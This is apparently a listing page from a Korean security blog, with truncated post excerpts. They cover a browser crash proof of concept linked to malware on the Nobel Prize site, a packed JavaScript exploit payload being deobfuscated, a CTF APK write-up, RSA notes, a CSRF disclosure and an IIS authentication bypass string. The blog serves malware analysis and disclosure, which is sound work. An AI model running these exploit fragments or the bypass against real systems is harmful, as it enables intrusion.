최근 노벨상 사이트에 삽입된 악성코드와 관련된 코드 입니다. 출처 : http://www.exploit-db.com/exploits/15341/ <html><body> <script> function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } function crashme() { var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) […]
[알고리즘] 1). 두 개의 큰 소수 p와 q를 선정한 다음에 법n 과 φn 을 계산합니다. 법n = pq φn = (p-1) (q-1) 2). 공개키 e는 φn과 서로 소(素)의 관계가 되게 임의로 선정합니다. 3). e*d Mod φn = 1 의 관계에 있는 개인키 d를 유클리드 알고리즘을 통해 구합니다. 4). {e, n}을 공개키로 공개하고, {d} 는 개인키로 […]
2010년 HUST 대회에서 안드로이드에서 사용되는 APK 파일 관련 문제가 나와서 풀이를 작성합니다.이 풀이를 통해 APK 파일을 분석하는 방법에 대해 간단하게 나마 적고자 합니다.[분석 첫번째 방법 – apktool 이용]1. android-apktool 툴이란게 있습니다. 해당 툴을 다운로드 합니다.다운로드 : http://code.google.com/p/android-apktool/2. 다운로드 받은 파일을 압축을 해제하면 apktool.bat 파일이 존재합니다. 아래와 같은 명령어를 통해 APK 파일을 풉니다.apktool.bat d 파일명.apk3. 이번 […]
최근 난독화 중 아래와 같이 난독화 된 코드를 좀 더 편하게 풀 수 있는 방법을 확인하다 아래와 같이 하면 되는것을 확인하여 기록합니다. (별거 아닌 팁 -_-) window["eval"](function(G_OGr1,HG2,iQLyacc3,EL4,bsKZR_ek5,PgTEsQ6){bsKZR_ek5=function(iQLyacc3){return iQLyacc3["toString"](36)};if(!''["replace"](/^/,window["String"])){while(iQLyacc3–){PgTEsQ6[iQLyacc3["toString"](HG2)]=EL4[iQLyacc3]||iQLyacc3["toString"](HG2)}EL4=[function(bsKZR_ek5){return PgTEsQ6[bsKZR_ek5]}];bsKZR_ek5=function(){return'\\w+'};iQLyacc3=1};while(iQLyacc3–){if(EL4[iQLyacc3]){G_OGr1=G_OGr1["replace"](new window["RegExp"]('\\b'+bsKZR_ek5(iQLyacc3)+'\\b','g'),EL4[iQLyacc3])}}return G_OGr1}('9 a(){8();7 0=4.5(\'6\');0.b(\'#c#i\');4.f(0);d{0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1)}h(e){}1.g+=\'\'}',19,19,'a7|window|setAttribute|s|document|createElement|body|var|acNK2e|function|aNop1|addBehavior|default|try||appendChild|status|catch|userData'["split"]('|'),0,{})) 위와 같이 난독화 되어 있는 코드는 우선 아래와 같은 순서로 Replace 해줍니다. /window[“//g /”]//g /[“/./g 이렇게 바꾸고 나면 아래와 같은 코드로 변하게 […]
악성코드 분석이나 포렌직 시 많이 이용되는 Sysinternals Tool을 최신버전으로 자동으로 업데이트 해주는 배치파일 입니다. 출처 : http://sysadmingeek.com/articles/batch-script-to-auto-update-sysinternals-tools/ @ECHO OFF TITLE Sysinternals Updater ECHO Sysintenals Updater ECHO Written by: Jason Faulkner ECHO SysadminGeek.com ECHO. ECHO. SETLOCAL ENABLEDELAYEDEXPANSION SET SysInternalsTools="%Temp%\SysInternalsTools.tmp.txt" SET CurrentTasks="%Temp%\CurrentTasks.tmp.txt" SET StartWhenFinished="%Temp%\StartWhenFinished.tmp.txt" ECHO Detected directory: %~dp0 %~d0 CD %~p0 ECHO. ECHO. ECHO Downloading current tool […]
최근에 그룹분들과 연구하여 제로보드 XE에 대한 관리자 권한이 획득 가능한 CSRF 취약점을 발견하여 리포팅을 하였습니다. 해당 건에 대해 8월 25일경에 패치가 나온것을 확인하여 기록용으로 남겨 둡니다. XE Core 1.4.3.1 changeset : r7598 ~ r7658 주요 변경 사항 CSRF 보안 취약점 수정 CSRF 보안 취약점이 발견되어 수정하였습니다. 해당 취약점을 알려주신 표경태님, 박영준님, 최영대님께 고맙다는 말씀드립니다. 해당 […]
최근에 악성코드를 보다 신기한 것을 봐서 기록해 둡니다. 우선 현재 저희 윈도우 탐색기 옵션 상태 입니다. 옵션 중 “알려진 파일 형식의 파일 확장명 숨기기” 에는 체크가 해제가 되어 있습니다. 그리고 제가 본 파일은 아래와 같습니다. 분명히 DOC 파일인데 아이콘이 이상합니다. 뭔가 수상해서 콘솔에서 다시 한번 확인해 보았습니다. SCR 파일이네요? 어떻게 이렇게 감출 수 있을까 고민하다 […]
Description:This vulnerability is because of using Alternate Data Stream to open a protected folder. All of IISauthentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication.Download: http://www.exploit-db.com/sploits/IIS5.1_Authentication_Bypass.pdf
2010년 HUST 대회에서 안드로이드에서 사용되는 APK 파일 관련 문제가 나와서 풀이를 작성합니다.이 풀이를 통해 APK 파일을 분석하는 방법에 대해 간단하게 나마 적고자 합니다.[분석 첫번째 방법 – apktool 이용]1. android-apktool 툴이란게 있습니다. 해당 툴을 다운로드 합니다.다운로드 : http://code.google.com/p/android-apktool/2. 다운로드 받은 파일을 압축을 해제하면 apktool.bat 파일이 존재합니다. 아래와 같은 명령어를 통해 APK 파일을 풉니다.apktool.bat d 파일명.apk3. 이번 […]
Description:This vulnerability is because of using Alternate Data Stream to open a protected folder. All of IISauthentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication.Download: http://www.exploit-db.com/sploits/IIS5.1_Authentication_Bypass.pdf